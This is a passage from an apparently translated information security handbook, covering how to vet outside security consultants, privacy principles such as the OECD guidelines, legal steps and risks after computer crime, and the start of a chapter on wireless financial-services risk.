For this reason, when you are considering a firm, you should:

Check references
Look for professional references who have engaged the person or organization for services similar to the ones you are seeking.

Check the people
If specific people have been proposed for your work, evaluate them using the methods described later in this discussion, under "People". Be cautious with large consulting firms that will not give you the names of the people who will work on your project until you have paid the first installment of the contract.

Consider the firm's stability and continuity
If you are contracting for a long-term project, you need to be sure that the firm will be there for the full term of the contract. This does not mean that you should not agree to use newly established firms, but you should make sure that the organization has the management and financial backing to meet its commitments. Avoid consulting firms with low rates: if they cannot cover their costs by selling the services you buy from them, they will try to make the money elsewhere, and their services, however good, will be focused elsewhere, perhaps even on a different line of business.
Beware of deception
Be wary of "all in one" contracts, in which a single firm develops all the policies and also sells the services and hardware needed to implement them. We have received reports of cases in which the security policy requirements and security plan requirements turned out suspiciously similar for every client, and all of them called for much the same basic hardware and consulting solutions. If you choose a firm that does not lock you into a long-term exclusive relationship, the policies it develops are more likely to match your real needs rather than the products it sells.

Consider breadth of experience
As far as possible, be cautious about choosing firms whose experience is mostly with one kind of client or one particular software platform, unless your organization's needs closely match those of the organizations the firm serves. For example, a consulting firm that mainly provides third-party security services to police departments running Microsoft Windows may not be a good choice for a pharmaceutical company that uses a mix of Windows and Unix. The firm's experience may not be broad enough to deliver policy services that fit your working environment. This does not mean that people whose background is in one particular area cannot offer you a suitable perspective, but you should be careful and see whether there is clear evidence that they can.

The staff of these firms should at least be familiar with the following:

• Labor law and the management issues that anticipate situations in which insiders take legal action against their employer;
• National and local computer crime laws;
• Encryption products, technologies, and limitations;
• Viruses, worms, other malicious software, and scanning software;
• TCP/IP fundamentals in virtual private networks (VPNs), and firewalls;
• General training and awareness, guidelines, and services;
• Incident response and legal prosecution;
• Hardware and software security; and
• Best practices, formal risk assessment methods, and insurance matters.

Any consulting firm that intends to produce good policies for its clients should have staff who are willing to discuss the topics covered in this book, and in this chapter in particular. If they are not willing or able to discuss these topics, they may not be a good choice.

If you have particular concerns about a firm, simply ask to see policies or procedures it has prepared for another client. Some firms will give you such a document with the client's name and identifying details removed. Others may have clients who have themselves asked to be listed as "reference clients". Some may ask you to sign a non-disclosure agreement before providing anything. Do not use firms that hand over their clients' names and documents to you and others without the clients' permission, because they will naturally hand your information to their next clients without permission as well. Finally, if you bring in experts from outside your organization or from another country, remember that one condition of the contract should be that they help build local capacity in your organization and, if possible, in your country.
It is entirely natural for companies in developing countries to use foreign experts during transition periods. Ideally, you can use these relationships to transfer knowledge and technology, to build local talent, and where possible to raise the level of knowledge of national experts.

Qualification criteria for IT security personnel
Above all, you should think about the people who will provide your security policy and implementation services. Unlike other consulting services, you need to be very careful with consultants hired for security work, because bringing in outsiders for security usually means giving them some level of access to your systems and information.

As mentioned earlier, there are not many skilled experts around. This means that you will sometimes have to engage people whose knowledge is not as comprehensive as you would like but who can nevertheless do the job. Watch out for people who make false claims about their expertise, or whose expertise is unrelated to what you need. It is better to use a person or firm that admits it will be "learning on the job" (and probably charges less for that reason) than to hire someone who tries to hide his or her shortcomings.
Today's security market in developed countries is saturated with people who have varying levels of expertise in securing Windows platforms, but experts in other platforms, including Unix, are scarcer. A great deal about security can be learned from books, but reading books alone is not enough. In the areas that concern you, look for evidence of staff qualifications, in particular:

Certifications
Ask applicants for their certifications and verify the ones they present. Some certifications can be bought: to obtain them a person need only attend a series of online seminars or training classes, memorize theory for a few hours, and answer multiple-choice questions. Such certifications are not worth much. Others require practical experience and deeper expertise.

Certification is still an evolving subject, so we are reluctant to cite current examples, but one that can be mentioned is the CISSP certification [106], which, although not everything one might want, is a credible credential attesting to a certain level of experience and expertise in security. [107]
Education
Check educational background. Some people have gained strong computing skills through self-study and personal experience, while others hold college and university degrees in computer science and engineering; the general view, however, is that level of skill matters more than degrees. As noted in the chapter on personnel, check whether applicants' claims match their credentials. The U.S. National Security Agency has designated a limited number of educational institutions as educational "centers of excellence" in information security. According to that list, in June 2002 the leading infosec programs were offered at George Mason University, James Madison University, Idaho State, Iowa State, the Naval Postgraduate School, Purdue University, the University of California at Davis, and the University of Idaho. There are many introductory IT centers around the world. Check your local resources, including universities, to find similar centers that may be based there. You can also choose one of the organizations listed in the appendices of this book.

[106] See the CISSP web portal at: http://www.cissps.com/
[107] See also the following certifications at www.isaca.org: CISA (Certified Information Security Auditor) and CISM (Certified Information Security Manager).
Reputation
If someone has written a widely used program or authored a book on a security topic such as viruses or cryptography, that does not mean the person is fully versed in security. Some authors have long experience across a wide range of security issues, but others are merely good writers or programmers. Be aware that great fame does not necessarily mean being qualified to consult.

Bonding and insurance
Ask the people you want to work for you whether they are insured and bonded. This shows that their company cares about the competence and conduct of its people. It does not guarantee that the organization has the necessary qualifications, but it does give some assurance that its staff do not have criminal records.

Affiliations
Ask people which local, national, and international organizations (ACM, ASIS, CSI, IEEE, and USENIX) they belong to and whether they are in good standing with them. These organizations provide their members with educational material and opportunities for professional development, and many of them also publish standards of professional conduct. If your candidate claims only membership in groups like "The 133t Hax0r Guild", you might do better to look elsewhere for a security expert!

[112] Purdue University
[113] The University of California at Davis

Reformed hackers
We recommend that you avoid working with individuals and organizations that claim to have employed reformed hackers as security consultants. [114] Although people who have been involved in computer crime can sometimes become useful members of society, one should not immediately trust those who have committed crimes or have a bad record. The following points are worth noting:

1. People whose past includes violating the law, personal property, and individuals' private rights do not seem a good choice for protecting customers' assets and privacy and safeguarding critical resources. Would you use a convicted criminal to design your organization's monitoring and alarm system? Would you hire a reformed felon to run the company's special-care center? These are not merely cases of poor foresight; if something goes wrong, each of them can land you in civil court. After all, it was you who decided to hire these people despite knowing their record.

2. Likewise, be careful with people who refuse to give you their real name when you interview them. Perhaps they really are expert at getting into an organization with a phone call! But one of the most basic reasons people use pseudonyms is that they do not want to be held responsible for their actions. If a pseudonym gets a bad reputation, it is far easier to change it than for someone to change a legal name or clean up its record.

3. Finally, many of today's hackers are not really that well versed in security. In both method and manner they act more like criminals than like programmers and computer architects. It is the poor quality of today's operating systems, the lack of security in planning, and the wide availability of automated intrusion tools that have made it so easy to break into and attack computer systems. Just as someone with a history of jumping cars is not necessarily a skilled race-car driver or an expert engine designer, someone who knows how to use intrusion tools and carry out denial-of-service attacks may also have fundamental gaps in his understanding of the security needed to keep systems safe.

[114] Statistics on U.S. companies that had hired reformed hackers appear in the 2003 CSI/FBI "Computer Crime and Security Survey": http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/FBI 2003.pdf

Monitoring services
If the general situation is stable, using monitoring and control services is a good investment. Commonly offered services include on-site contractor administration, on-site and off-site security monitoring, incident response and forensics (on request), and maintaining an alternate site for use when the main site fails. But in addition to concerns about the people who provide consulting services, you must also be careful about the hardware and software they use.

Many monitoring and incident-response firms have hardware and software that they want to install on your network. They use it to collect the information needed to review and change the system's security settings. You need to treat this technology cautiously, because it sits in a privileged position inside your security perimeter:

1. Make sure you receive complete, written descriptions of the function of the various network components and equipment. Also make sure you understand how those components work and what each one does.

2. Regarding equipment failures, obtain a written statement from whoever is responsible for the component in question. If hardware or software installed on your system sends your data outside the organization, or unexpectedly brings your systems down during the busiest hours of the day, you should not suddenly discover that under your agreement with the vendor no liability falls on him!

3. Be sure that careful attention went into developing, testing, and deploying the technology being added to your systems, especially if it has a one-of-a-kind design. In particular, given the quality record and security problems of Microsoft's software, we suggest taking due care before using the services of any company that has decided to base its security technology on Microsoft products, because that company must continually fix newly discovered flaws in most of its current products while also maintaining those products' compatibility with earlier versions.

4. Examine carefully whether the company's technology actually helps prevent problems or only detects them after they have occurred.

Final words on outside resources
Using outside experts is a good way to obtain the protection you need. The skills required to write policies, monitor intrusion detection systems and firewalls, and prepare and carry out a disaster recovery plan are sometimes highly specialized and uncommon, and may not exist among the organization's current staff. Doing these things right is what decides whether a business continues or comes to an end because of various failures.

At the same time, the security consulting field is fraught with danger, because it is new and not well understood. Charlatans, frauds, the inexperienced, and novices are always present, and in many cases they cannot be distinguished from the trustworthy professionals working in the field. Time does help sort things out, but choosing correctly at the outset takes some effort and investment.

One suggested way to benefit from the growth of this field is to avoid entering into long-term contracts, unless your security provider is highly trustworthy and consistently keeps itself up to date. The security consulting landscape is likely to change considerably over the next few years, and your interests will be better served if you are able at any time to choose among the options that emerge with those changes.
Finally, even though you have contracted for services that monitor your systems for misuse, do not give up your own vigilance: stay as alert as you can and strengthen your systems. As threats become more sophisticated, defenders and potential victims must advance as well.

Chapter Eight
Legislation, Government Regulation, and Privacy Policies

Overview
In this chapter we review how public commercial policies are drawn up for nonprofit and government institutions in a networked world. We will see examples of legislation to protect citizens, customers, and children from identity theft, fraud, and indecent material. Part Four offers a deeper discussion of the legal issues of cyberspace [115]. In this chapter our emphasis is more on organizational responsibility in the public sphere. What standards should organizations and Internet companies engaged in commerce follow when collecting information that makes it possible to identify a user?

[115] Cyberspace

Business and customer relationships in the digital world
Online merchants learn a great deal about their customers. An online store knows which products you are looking at; which you add to your shopping cart and later remove; and which you ultimately buy online. Online merchants also know whether you are shopping from home or from work, and if they wish they can find out the remaining credit on your payment card as well. Moreover, unlike in the offline world, an online merchant can correlate your purchase history with your browsing habits and, by making such correlations across the data of a wide range of customers, discover valuable behavioral patterns.

ISPs can learn even more about their customers, because everything an Internet user sees must first pass through the ISP's computers. ISPs can also determine which web sites their users visit and even which articles they have read. They can even analyze people's email by the keywords used in the text. By tracking and analyzing this information, an ISP can tell, for example, whether its users are interested in travel by boat or by car, whether they care about fashion, and whether they show interest in the treatment of a particular disease.

Privacy policies
In the United States, consumer rights were first explicitly addressed in the Fair Credit Reporting Act [116] (enacted in 1970). This law recognized basic consumer rights, such as the right of each consumer to see his own credit reports, the right to know who sees the reports about him, the right to require reporting agencies to investigate errors discovered by consumers, and the right to require agencies to add a statement from the consumer to disputed reports. In 1973, at a time when personal data was increasingly being held on computers, the Code of Fair Information Practices [117] was issued to uphold consumer rights.

The Code of Fair Information Practices [118]
The Code of Fair Information Practices rests on five principles:
• No system for keeping records of personal data may exist in secret.
• There must be a way for a person to find out what personal information about him is recorded and how that information will be used.
• There must be a way for people to prevent their personal information from being used for purposes other than those announced to them.
• There must be a way for the person to correct information about himself that identifies him.
• Any organization that creates, maintains, uses, or disseminates records of personal data that identify individuals must ensure the reliability of the data for its intended use and must prevent misuse of the data.

[116] Fair Credit Reporting Act
[117] Code of Fair Information Practices
[118] Source: U.S. Department of Health, Education, and Welfare

The U.S. Congress continued to pass laws regulating the use of personal information. Over time, bank records, telephone records, Internet records, cable television subscriber records, medical records, educational records, and even videotape rental records all came under U.S. congressional legislation. However, each piece of legislation creates different protections and is enforced by a different part of government. Some violations, such as those covered by the Antijunk-Fax Telephone Consumer Privacy Act [119], could not be prosecuted without a complaint from a private plaintiff. In Europe, however, things were different. Based on the experience of the Second World War, in which a great deal of personal information was misused by the Nazis, most European governments preferred to use dedicated institutions to regulate the collection and use of personal information. The Europeans generalized the ideas of the Code of Fair Information Practices into an overall regime known as data protection [120].

[119] Antijunk-Fax Telephone Consumer Privacy Act
[120] Data Protection

Guidelines of the Organization for Economic Cooperation and Development
In 1980 the Organization for Economic Cooperation and Development (OECD) [121] adopted and issued a set of privacy guidelines. The guidelines were designed in part to harmonize the growing body of privacy rules in the industrialized countries. They were specifically designed to address the increasing problems of transborder data flows: the movement of personal information from a country where personal data is strongly protected to another country where it enjoys less protection. The OECD guidelines on the protection of privacy and transborder data flows consist of eight principles:

Collection Limitation Principle [122]
There should be limits to the collection of personal data. Any personal data should be obtained by lawful and fair means, under proper conditions, and with the knowledge and consent of the person to whom the information relates.

Data Quality Principle [123]
Personal data that is collected should be relevant to the purpose declared for its use, or to areas related to that purpose. The data should be kept accurate, complete, and up to date.

Purpose Specification Principle [124]
The purpose for which personal information is collected should be specified at the moment of collection, not later. Subsequent uses of the collected information should be limited to those purposes; if later purposes are not compatible with the original ones, the change of purpose must be stated explicitly, and the person's consent to the use of his information for the new purposes is also required.

Use Limitation Principle [125]
Personal data should not be disclosed, made publicly available, or used for purposes other than those declared, as stated in the preceding principles, except:
o with the consent of the person who owns the information; or
o by authority of law.

[121] Organization for Economic Cooperation & Development
[122] Collection Limitation Principle
[123] Data Quality Principle
[124] Purpose Specification Principle
Security Safeguards Principle [126]
Personal data should be protected by appropriate security safeguards against risks such as loss and unauthorized access, destruction, modification, disclosure, and use.

Openness Principle [127]
There should be a general policy of openness about practices and policies with respect to personal data. Means should be readily available for establishing the nature of personal data, the main purpose of their use, and the usual period for which they are kept.

Individual Participation Principle [128]
Everyone should have the right to:
o find out whether the data collector holds information about him;
o communicate with the collector of information about him within a reasonable time, at low cost, in a reasonable manner, and in a form in which the information is intelligible to him;
o be given reasons if one of the above requests is denied, and be able to challenge the denial; and
o challenge information relating to him and, if the challenge succeeds, have the information erased, corrected, or completed.

Accountability Principle [129]
Every data collector should be accountable for complying with the principles stated above.

[125] Use Limitation Principle
[126] Security Safeguards Principle
[127] Openness Principle
[128] Individual Participation Principle
[129] Accountability Principle

The OECD guidelines do not carry the force of law; instead, these eight principles are used as guidance when the laws of each member country are reviewed.

For a simple checklist of information protection measures to apply if you collect information about customers through a web site, see Chapter Eleven of this part of the book.

Chapter Nine
Computer Crime

Overview
We hope you will never have to act on the information in this chapter. You may have studied this book diligently and taken every important step to secure your system, and yet your system may still be misused. Perhaps a former employee will break in using an old account and delete some records. Perhaps, despite all your efforts to prevent intrusions, someone from a foreign country will manage to get into your system. In that situation, what evidence would you have to present in court? One can also ask what legal risks you face in the ordinary use of your system. What do you do if you become the target of a lawsuit? This chapter tries to clarify these questions. What is said here should be taken only as general advice, not as legal counsel; for further detail and finer points you should ask good lawyers and experienced legal advisers to guide you according to the laws of the country where you reside.

Your legal options after a break-in
If your computers are damaged by a break-in, the legal system of your country of residence may offer a number of options you can use. This chapter cannot advise you on the precise use of the various aspects of the law, because laws and legal systems differ greatly from country to country. In this chapter, therefore, we will not go beyond U.S. law. [130] Nevertheless, the global reach of the Internet has made laws that do not originate within the United States a necessity.

Before deciding to begin any legal proceedings, consult a competent lawyer. Because legal approaches carry risks and difficulties, you should be sure that you want to pursue legal action before you start.

In some cases you may have no choice and be obliged to pursue legal action. For example:
• If you want to file a claim with your insurance company to recover losses caused by a break-in, the insurer may require you to pursue legal action against the intruders.
• If you process special and classified information, government regulations may require you to investigate and report suspicious activity.
• If you become aware of illegal activity and do not report it, you may be legally liable as an "accessory to the crime", especially if your computer was used in that illegal activity.
• If your computer is used for unauthorized and improper activities and you do nothing about it, a criminal complaint may be brought against you for the damage caused.
• If you are an executive of a public company and decide not to investigate and prosecute illegal activity, your company's shareholders can bring suit against you.
• If you are an executive of a private company, even one that has no shareholders, then partner companies, backers, or customers may sue you, depending on each country's computer crime laws.

If you work at a company and know that your system is at high risk, you should as a rule talk with your organization's legal counsel as part of your security planning (before a security incident occurs). Organizations adopt different policies regarding whether or not to involve law enforcement. By rehearsing crisis procedures, you increase the likelihood that the policies will actually be followed when they are needed.

By way of some starting points, this section gives an overview of a few issues that you are quite likely to face some day:

[130] A more extensive discussion of legal issues in the United States can be found in the book "Computer Crime": A Crimefighter's Handbook (O'Reilly). We recommend consulting this book if you need further explanation of the matters touched on in this chapter. The book is out of print, but copies and older editions are available.

Filing a criminal complaint
In the United States, whenever you believe someone has broken the law you can take legal action against that person, and the process begins with filing a formal complaint with the authorities. The prosecutor's authorization is then obtained to investigate the allegation and, if a crime is found, to file charges on that basis.

In some, perhaps most, cases a criminal investigation will yield no result for you. If the illegal acts are not repeated and the intruder left no trace, or if your system was attacked from a foreign country, it is very unlikely that the intruders will be identified and arrested. Professional intruders rarely leave a trail. [131]

Filing a complaint does not necessarily lead to prosecution. The relevant prosecutor (at the national, state, or local level) decides on the basis of the law that was broken, the seriousness of the crime, the need for the cooperation of trained investigators, and the type of sentence. Remember that the judicial system is overloaded with cases. New cases are therefore likely to be investigated only if they involve particular crimes or serious threats. For example, a case in which $200,000 worth of data was destroyed is far more likely to be investigated than one in which someone repeatedly scans your personal computer through a modem.

You may or may not be given information about the investigation. You may even be given false information while the investigation is in progress: for example, you may be told that no investigation is under way while investigators are in fact hard at work.
An investigation can put you in a precarious position. If unknown individuals continue to break into your system, the authorities may ask you to leave your system open so that investigators can trace the connections and gather evidence for an arrest. Unfortunately, leaving your system open after it is known to be under misuse can expose you to a third-party lawsuit if the intruders use your system to damage other systems, because cooperating with law enforcement does not shield you from such claims. Weigh the matter thoroughly before accepting such risks.

[131] Of course, very few intruders are really as clever as they think they are.

Contacting the appropriate authorities about computer crime
Depending on the legal and criminal justice system in your country, you may need to take particular steps to contact local or national authorities. Some general recommendations follow; naturally, they will be more effective if you apply them in the way appropriate to your own country.

• If possible, approach local or provincial authorities first. If the provincial authorities determine that the matter can be better investigated by national agencies, they will suggest that you contact them. Unfortunately, some local law enforcement agencies are reluctant to call in help from national officers, which may mean that your security incident is not properly investigated.
• Local authorities may be more interested in pursuing your complaint, because your problem is unlikely to be sitting alongside thousands of similar cases (as it would at the national level). Local officials are therefore more likely to care about your problem, even if it is very small.
• Although some local officials may be highly skilled in computers and computer crime, even in the United States local officials generally have less experience than state and national ones and may find advanced investigations difficult. Many national agencies, by contrast, have experts who can be brought in quickly to help solve problems.
• In the United States, state authorities show more interest than national authorities in investigating and prosecuting crimes by juveniles. If you know that you were attacked by a juvenile who lives in your own state, you would do better to go to the local authorities. Sometimes it is better still to set legal action aside and speak directly with the young attacker's parents or teachers (or ask a lawyer or a police officer to do so for you).

Hazards of prosecution
There are many potential problems in seeking help from law enforcement, and they are not limited to the agencies' experience with computers, networks, or the prosecution of computer crime. Sometimes officials without sufficient computer knowledge and experience may ask for your help in understanding the details of the case. In other cases they may disregard your information in order to hide their own lack of knowledge and avoid having the agency's credibility questioned. It should be noted that in many cases the victim may also have had a part in the criminal activity. An experienced investigator in the physical world does not place complete, unquestioning trust in the victim's account, and the same holds for crimes in cyberspace.

If you and your staff are asked to take part in the investigation to help identify material, make sure that this is done under a court order; otherwise it may appear that you were an overeager victim. It is better to designate a neutral person to work with the representatives of the police and law enforcement agencies.

The attitude and conduct of law enforcement officers occasionally cause serious problems. Some of your equipment may be seized for unjustifiably long periods on the pretext of examination or inspection, even if you yourself are the victim of the computer crime. If you are the victim and reported the incident yourself, the authorities will usually keep you informed of their efforts so as to minimize your dissatisfaction. However, if the intruders are your own employees, or if sensitive matters such as official and military information are involved, you may have no control over how, or for how long, your systems and storage media are examined. The problem becomes more acute when the investigators also need help from specialists outside their local offices. Be sure to keep track of the downtime forced on you by the investigation, because that time and the resulting losses can be counted as part of the damages in the prosecution and subsequently used in any civil suit (suits that may be filed against the attacker and sometimes against the law enforcement agency itself).

Backups are a very valuable resource during an investigation. In addition, if necessary you can use your backup systems while your main systems are being inspected and examined.
When you cooperate with law enforcement in an investigation, the heavy-handedness and ineptness of that investigation may turn the computing community's view of you negative. Most computer users hold a negative view of law enforcement, and if you are seen in that camp, those feelings are directed at you too. Such judgments can lower your standing below what you deserve and hamper your participation not only in that investigation but in other professional activities as well. In addition, after the investigation ends you may become the target of electronic attacks or other abuse.

Such attitudes are regrettable, because many investigators are careful and professional, and thorough investigations may really be needed to stop a suspicious activity or a persistent attack. Today we can say that this problem has diminished in recent years and is less of a concern than it was a decade ago. Over time, as people become more aware of the damage intruders do, even those who mean no harm, these negative feelings toward law enforcement can be expected to fade further.

We strongly advise you to think carefully and weigh all sides when deciding whether to bring any security problem with your system to law enforcement. In most cases you should consider when going to the authorities is warranted: when you have actually lost something and suffered damage, or when you cannot control the situation yourself. Sometimes the publicity surrounding an incident is more harmful than the other losses the incident causes.
Once you have decided to call in law enforcement, avoid making a public fuss about it. In some cases the involvement of law enforcement can deter intruders, but in others it can make you a focus of their attention and therefore of more attacks. Be aware that your current problem may be part of a larger one that is still growing and spreading, and that if you do not handle it properly it may cause great harm to you and to others.

We prefer to take an optimistic view. Law enforcement agencies are generally aware of the need to improve their handling of computer crime, and are typically working to set up training centers, establish forensic analysis organizations and facilities, and adopt other tools for effective investigations. In prosecutors' offices (especially in the more developed parts of the country), some investigators and prosecutors typically gain considerable experience and so should strive to pass their knowledge on to their colleagues. The result in recent years has been a fundamental improvement in law enforcement's level of success and a large number of successful investigations and prosecutions of cybercrime. Keep in mind the many benefits of reporting computer crime, not only for yourself but for society as a whole: successful prosecutions can prevent further misuse of your systems and of others'.

The responsibility to report crime
Finally, remember that a crime will be prosecuted only if you report it. Otherwise nothing is done, which benefits neither you nor anyone else, and leaves the intruder free to do more damage, and to other people. Remember that what you have encountered may be part of a large pattern of computer crime and sabotage. Without proper investigation there is no way to say whether what happened to you was an isolated incident unrelated to other parts of the system or part of a larger attack.
Another problem with not reporting serious computer crime is that some people will wrongly conclude that such crimes are rare and will therefore regard the chance of such problems on their own systems as negligible; little emphasis will be placed on budgets and training for new law enforcement officers; little effort will go into improving existing laws; and the public will pay less attention to matters of this kind. The upshot is a computing environment that is more dangerous for everyone in it than it may appear.

Further precautions...
This section summarizes additional suggestions for guarding against possible misuse of your computers:
• Put your copyright and proprietary ownership notices at the very beginning of each file of your program source code and data. If you explicitly claim copyright, be sure to provide a dedicated form on the matter for each customer to fill out. Doing so can aid closer investigation and the recovery of damages.
• Make sure users are fully aware of what they may and may not do and of their responsibilities.
• Notify all users of everything that is monitored on your network (provided doing so does not violate your policies). Monitoring may include email, keystrokes, and file access. If no notice of monitoring is given, even monitoring an attacker's activity may be deemed a violation of privacy laws.
• Make good backups and keep them in a safe place. If the backups need to be compared with one another to establish the facts, you must be able to identify who has had access to them. Keeping backups in public areas means they cannot later be used as evidence.
• If you observe anything suspicious or any incident that calls for the involvement of law enforcement, start taking notes. Record your observations and actions and the time of each. Print copies of log files and traces and attach them to your notes. A written record of what happened can be invaluable during an investigation. Also record the time and subject of every contact with law enforcement.
• Try to define in writing the level of authority of every employee and user, including everything the person is authorized to access (and everything he is not). Devise a mechanism for communicating these definitions so that each person can understand and follow them and understands the limits they impose.
• Tell your employees explicitly that at the end of their employment, or whenever asked, they must return all materials that were in their possession (such as program source code and manuals).
• If something has happened that you believe calls for a police investigation, do not let your staff conduct investigations of their own. Such efforts may cause some evidence to lose its admissibility in the official investigation. Investigators may also take a negative view of you when they see you interfering in the investigation.
• Require your employees to sign an agreement covering their responsibilities regarding sensitive information, computer use, use of email, and other computing matters that may arise later. Make sure the policies are explicit and fair, and that all employees are aware of them and have signed the agreement. State explicitly that all access and access rights end when employment ends, and that any unauthorized access during or after employment will be prosecuted.

Criminal hazards in business
If you are an ISP, run a web site, or otherwise operate computer networks at your place of business, you yourself may face prosecution if your machines are misused.
If the judicial authorities conclude that your computers were used by an employee to break into other computers, to transmit and store classified information (including trade secrets, child pornography, and so on), or to take part in computer crimes, your computers may be seized under a seizure order so that they can be examined. If during the investigation you can prove that the employee's access to your system was limited, the scope of the seizure may be reduced, but even so it is very likely that some of your machines will remain impounded for the duration of the official investigation.

Depending on the procedures accepted in each country's legal system, if the local police or national authorities believe that there is evidence of a violation of the law, they ask a judge for a warrant to investigate, and the judge issues a search warrant. In recent years a number of investigators and officials in the United States have, in some states, established a standing for carrying out broad and heavy-handed investigations. One reason for this is the insufficient experience of law enforcement agencies in dealing with computer crime, which appears likely to improve over time through this and similar work.

Extra Caution...

• Equip yourself with network monitoring and keystroke monitoring systems. This software can monitor and record all information sent or received. If you feel that you have been penetrated, start monitoring and recording immediately and do not wait for a court order, because law enforcement usually cannot, without the court's permission, authorize you to act as an agent of the law, and obtaining a judge's order granting that permission may take a long time.

• With the help of your lawyer and your insurance company, draw up contingency plans for the actions, the related investigations, and every related activity that you must carry out when an intrusion occurs.

• Identify the law enforcement officials who are qualified to investigate potential problems; introduce yourself to them, and share your concerns with them before an incident occurs. If in the future you run into a problem that requires the help of law enforcement agencies and the police, even a very basic acquaintance with these people can be very helpful.

• Do not forget to join societies and organizations that continuously provide security awareness and training to individuals in order to increase their expertise in this field.

Chapter Ten
Mobile Risk Management: Electronic Financial Services in the Wireless Environment [132]

Overview

In this chapter we examine the risks that arise from the use of wireless technologies in financial services and that threaten electronic security through identity theft, the hijacking of system activities, and other similar actions. The chapter makes clear that although the "volume" of transactions carried out in an environment affects the breadth of the security measures that are necessary, the mere use of wireless technology can also expose security weaknesses. Several important points are noted that system administrators (particularly in banks) can act on to reduce risks to the greatest extent possible, usually without a large increase in total cost. The measures proposed in this chapter for reducing risk also encompass, in a sense, the existing best practices for delivering financial services based on wireless technology.

Wireless Technology in New Industries and Sectors

The rapid growth in the use of wireless technology in many emerging financial services markets has made careful attention to electronic security issues in this technology essential. In no emerging-market area is this topic as important as it is in wireless technology, which has driven the spread of mobile phone technology in these markets. The more countries strive to use this technology to deliver financial services, the more vital it becomes to attend to the potential security risks of wireless technology and to how well business partners in the market and system administrators in banks and other service institutions can guarantee security. The aim of this chapter is therefore to explain why and how electronic security becomes a concern, and how these risks can be reduced without additional cost to financial service providers. Given the very important point that very rapid technological change has deprived the administrators of financial services systems of the possibility of fixed and unchanging solutions, many of the measures recommended in this book relate to layered security in wireless financial services applications and represent what are recognized today as best practices in electronic security.

This chapter is divided into the following parts: Part A acquaints the reader with the wide range of applications of wireless technology and electronic financial services around the world; Part B introduces the inherent risks of wireless technology; Part C describes the weaknesses of wireless local area networks (WLANs) [133] and the risk-mitigation procedures needed to secure them; Part D addresses the evolution of global mobile communication networks (GSM networks) [134] and the vulnerabilities present in them; Part E explains in detail the proper ways of dealing with the risks of GSM networks; Part F presents best practices for risk management in the delivery of payment services; and Part G offers a final summary and an outlook on the future (third generation; 3G).

The aim of this chapter is to present a set of risk management and security solutions for banks and payment systems. The chapter attempts to provide a framework for assessing security risks that is applicable in the wireless environment.

[132] See the World Bank paper by Tom Kellerman titled "Mobile Risk Management: e-Finance for the Wireless Environment (2002)": http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Publications
[133] Wireless Local Area Networks
[134] Global System for Mobile Communication Networks
A. Overview of Electronic Financial Services [135]

Electronic financial services, whether delivered over the Internet or through remote mechanisms, have grown rapidly. Countries and consumers are being connected to one another at an increasing rate. These technologies not only expand the set of countries that belong to the network, they also create new ways of delivering financial services. Since the mid-1990s, banking industry investment aimed at increasing customer satisfaction has focused on Internet banking. Electronic financial services have lowered the cost of financial services. In addition to saving on the fixed costs of developing and maintaining branches, the Internet has eliminated many extra steps and reduced costs. Carrying out an ordinary transaction through a branch or a telephone call costs about one US dollar, while carrying out the same transaction over the Internet costs about 0.02 dollars. The low cost of Internet financial services has driven their adoption. Internet-based services in emerging markets are sometimes as widespread as those in the industrial world. For example, Internet banking has spread in Brazil as it has in the United States. Because most developing countries lack adequate fixed-line infrastructure, most financial institutions have implemented their services on wireless platforms in order to extend access to them. Alongside these realities, four technology-related trends have emerged in the industry: outsourcing, open architecture, integrated strategies, and new methods of electronic payment. [136]

Electronic financial services consist of four main parts: electronic funds transfers (EFT) [137], electronic data interchange (EDI) [138], electronic benefits transfers (EBT) [139], and electronic trade confirmation (ETC) [140]. EFT is in fact the oldest form of electronic money exchange, and became customary from the early 1960s. On a global scale there is a very large amount of EFT within and between banks, which the United States Treasury has estimated at about 2 trillion dollars per day or 700 trillion dollars per year. A major part of the international bank EFT on the SWIFT network is carried over satellite links. At present roughly half of the world's 200 countries obtain their Internet and their large internal networks through satellite links. Although most of these countries are economically developed, this causes heavy traffic and a large volume of economic activity, and from the standpoint of security vulnerabilities this is a major concern. [141] By 2005 the share of Internet banking will rise from 8.5% to 50% in industrial countries and from 1% to 10% in emerging markets. With better connectivity in emerging markets, Internet banking transactions may rise by up to 20% in 2005, which would be a figure of more than six trillion dollars of business-to-business (B2B) [142] Internet transactions. [143]

In the wake of the growth of electronic financial services another trend is also taking shape: the ever-growing use of wireless communications in developed and developing countries. This relatively new medium is rapidly becoming the main medium of electronic commerce and electronic financial services. The shift of businesses from paper systems to Internet-based platforms has been very profound. As the platform for all kinds of services changes from landlines to wireless technologies with greater access, the negative effects of this phenomenon spread as well.

Mobile devices are regarded today as the leading edge of the world's technologies. In 1990 there were only eleven million mobile phone subscribers in the whole world. [144] By 1999, with the spread of wireless technologies, this number had passed five hundred million, and it is now almost twice that. Examining similar statistics in developing countries shows clearly the leap brought about by the use of mobile devices. [145] Cambodia, which had lost its fixed-line network after about 20 years of civil war, was able to re-establish its connectivity by using wireless technology. Within one year of starting to use wireless technology, the number of mobile phone subscribers overtook the number of fixed-line customers. Cambodia, while having one of the lowest per-capita incomes in the world, has overtaken 31 countries in general telephone penetration, including some countries with far higher incomes. Instead of spending vast amounts of resources and time on building fixed-line infrastructure to facilitate communications, countries have replaced these wired structures with cheap mobile phone towers that are also simpler to produce. These developments have, of course, brought with them a number of security risks, some of which are very serious.

Continuous economic development and new ways of delivering financial services, such as wireless protocols, have made it possible for banks to deliver financial services remotely; the point, however, is that these opportunities are not limited to the formal economy. Alongside these advances, the global underground and criminal economy has also managed to adapt itself well to technology. Delivering financial services over wireless media has provided opportunities for identity theft, the transfer of counterfeit funds, and extortion.

[135] For a more detailed analysis of electronic security, see the following source written by T. Glaessner, T. Kellerman, and V. McNevin (2002): "E-Security Risk Mitigation for Financial Transactions"
[136] Gilbride, Edward. Emerging Bank Technology and the Implications for E-crime. Presentation, September 3, 2001
[137] Electronic Funds Transfers
[138] Electronic Data Interchange
[139] Electronic Benefits Transfers
[140] Electronic Trade Confirmation
[141] Dr. Joseph N. Pelton, "Satellite Communications 2001: The Transition to Mass-Consumer Markets, Technologies, and Systems".
[142] Business To Business
[143] Jupiter Communications, 2001
[144] Box 1 of "E-Finance in Emerging Markets: Is Leapfrogging Possible?", Claessens S., T. Glaessner, D. Klingebiel, 2001.
[145] Part one of the book "E-Finance in Emerging Markets: Is Leapfrogging Possible?", 2001, by Claessens S., T. Glaessner, D. Klingebiel

B. Risks of Electronic Financial Services on Wireless Networks

